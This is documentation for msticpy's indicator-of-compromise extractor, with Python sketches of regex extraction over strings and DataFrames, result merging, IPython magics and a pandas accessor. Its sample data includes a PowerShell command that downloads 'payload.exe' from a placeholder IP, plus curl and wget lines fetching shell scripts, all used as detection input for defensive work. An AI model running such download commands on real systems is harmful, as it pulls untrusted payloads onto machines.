Title: msticpy - IoC Extraction
Description:
This class lets you extract indicator of compromise (IoC) patterns from a string or a DataFrame. Several patterns are built into the class, and you can override these or supply new ones.
You must have msticpy installed to run this notebook (for example, via pip install msticpy).
Looking for IoC in a String
Here we:
Get a commandline from our data set.
Pass it to the IoC Extractor
View the results
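The steps above amount to running a set of named regular expressions over a string and collecting the matches by type. The following is a minimal standard-library sketch of that idea, not msticpy's implementation: the pattern names, the regexes, the extract_iocs helper and the sample command line are all illustrative assumptions.

```python
import re
from collections import defaultdict

# Simplified, illustrative patterns (assumptions, not msticpy's built-in regexes).
PATTERNS = {
    "ipv4": re.compile(
        r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
    ),
    "url": re.compile(r"\bhttps?://[^\s'\"<>]+", re.IGNORECASE),
    "md5_hash": re.compile(r"\b[a-fA-F0-9]{32}\b"),
}


def extract_iocs(text):
    """Return {ioc_type: set of matches} for every pattern that matches text."""
    found = defaultdict(set)
    for ioc_type, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            found[ioc_type].add(match.group(0))
    return dict(found)


# Hypothetical command line standing in for a row from the data set.
cmdline = "powershell -c iwr http://203.0.113.7/payload.exe -OutFile c:\\temp\\p.exe"
results = extract_iocs(cmdline)
print(results)
```

Returning a dictionary keyed by IoC type keeps each kind of observable separate, so a caller can, for instance, look up only the URLs.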
If we have a DataFrame, look for IoCs in the whole data set
You can change the data= parameter of ioc_extractor.extract() to pass other DataFrames. Use the columns parameter to specify which column or columns to search.
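To make the data and columns parameters concrete, here is a small pandas sketch of what scanning selected columns involves. It produces one output row per match and records the index of the input row it came from. The extract_from_frame helper, the single URL pattern, the sample data and the IoCType and Observable column names are assumptions for illustration; only SourceIndex is taken from the text of this notebook.

```python
import re

import pandas as pd

# Illustrative single pattern (an assumption, not msticpy's built-in regex).
URL_RE = re.compile(r"\bhttps?://[^\s'\"<>]+", re.IGNORECASE)


def extract_from_frame(data, columns):
    """Scan the named columns and return one output row per regex match."""
    rows = []
    for col in columns:
        for idx, value in data[col].items():
            for match in URL_RE.finditer(str(value)):
                rows.append(
                    {"IoCType": "url", "Observable": match.group(0), "SourceIndex": idx}
                )
    return pd.DataFrame(rows, columns=["IoCType", "Observable", "SourceIndex"])


# Hypothetical process data; only CommandLine is searched.
process_df = pd.DataFrame(
    {
        "CommandLine": [
            "curl http://example.test/a.sh",
            "whoami",
            "wget http://example.test/b.sh http://example.test/c.sh",
        ],
        "ParentCommandLine": ["bash", "cmd.exe", "bash"],
    }
)
ioc_df = extract_from_frame(process_df, columns=["CommandLine"])
print(ioc_df)
```

With msticpy itself, the corresponding call described above would take the form ioc_extractor.extract(data=process_df, columns=["CommandLine"]).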
IoCExtractor API
Predefined Regex Patterns
extract_df()
extract_df() behaves identically to extract() called with a data parameter. It may be more convenient to use when you know that your input is a DataFrame.
The SourceIndex column allows you to merge the results with the input DataFrame
Where an input row has multiple IoC matches the output of this merge will result in duplicate rows from the input (one per IoC match). The previous index is preserved in the second column (and in the SourceIndex column).
Note: you will need to set the type of the SourceIndex column. In this case we are matching against the default numeric index, so we force the type to be numeric. If your index has a different dtype, you will need to convert the SourceIndex column (dtype=object) to match the type of your index.
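The merge and the dtype conversion described above can be sketched with pandas alone. The results frame here is hand-written to stand in for extractor output, and the sample data and the IoCType and Observable column names are illustrative assumptions. The SourceIndex column is created with dtype=object to mirror the note.

```python
import pandas as pd

# Hypothetical input with the default numeric (RangeIndex) index.
input_df = pd.DataFrame(
    {
        "CommandLine": [
            "curl http://example.test/a.sh",
            "whoami",
            "ping 203.0.113.7 && curl http://example.test/b.sh",
        ]
    }
)

# Hand-written stand-in for extractor output; SourceIndex starts as dtype=object.
ioc_df = pd.DataFrame(
    {
        "IoCType": ["url", "ipv4", "url"],
        "Observable": [
            "http://example.test/a.sh",
            "203.0.113.7",
            "http://example.test/b.sh",
        ],
        "SourceIndex": pd.Series([0, 2, 2], dtype=object),
    }
)

# Convert SourceIndex so that its dtype matches the numeric input index.
ioc_df["SourceIndex"] = pd.to_numeric(ioc_df["SourceIndex"])

# Join each input row to its IoC matches; rows with several matches are repeated.
merged = pd.merge(
    input_df, ioc_df, how="left", left_index=True, right_on="SourceIndex"
)
print(merged)
```

Input row 2 has two matches, so it appears twice in the merged output, while the row with no matches is kept once with empty IoC columns because of how="left".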
IPython magic
You can use the line magic %ioc or the cell magic %%ioc to extract IoCs from text pasted directly into a cell.
The ioc magic supports the following options:
Pandas Extension
The IoC extraction functionality is also available through a pandas extension, mp_ioc, which supports a single method, extract().
This method supports the same syntax as extract() (described earlier).
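For readers unfamiliar with pandas extensions, the sketch below shows the general mechanism using pandas' register_dataframe_accessor decorator. It is not msticpy's code: the accessor name demo_ioc, the DemoIocAccessor class, the simplified IPv4 pattern and the output column names other than SourceIndex are hypothetical and chosen only for illustration.

```python
import re

import pandas as pd

# Simplified, illustrative pattern (an assumption, not msticpy's built-in regex).
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@pd.api.extensions.register_dataframe_accessor("demo_ioc")  # hypothetical name
class DemoIocAccessor:
    """Toy accessor exposing a single extract() method on any DataFrame."""

    def __init__(self, pandas_obj):
        self._df = pandas_obj

    def extract(self, columns):
        """Return one row per IPv4-like match found in the given columns."""
        rows = [
            {"IoCType": "ipv4", "Observable": m.group(0), "SourceIndex": idx}
            for col in columns
            for idx, value in self._df[col].items()
            for m in IPV4_RE.finditer(str(value))
        ]
        return pd.DataFrame(rows, columns=["IoCType", "Observable", "SourceIndex"])


logs = pd.DataFrame({"CommandLine": ["ping 198.51.100.4", "dir"]})
found = logs.demo_ioc.extract(columns=["CommandLine"])
print(found)
```

Once an accessor is registered, the method is reachable from every DataFrame, which is what lets a call such as df.mp_ioc.extract(...) work without passing the frame as a data argument.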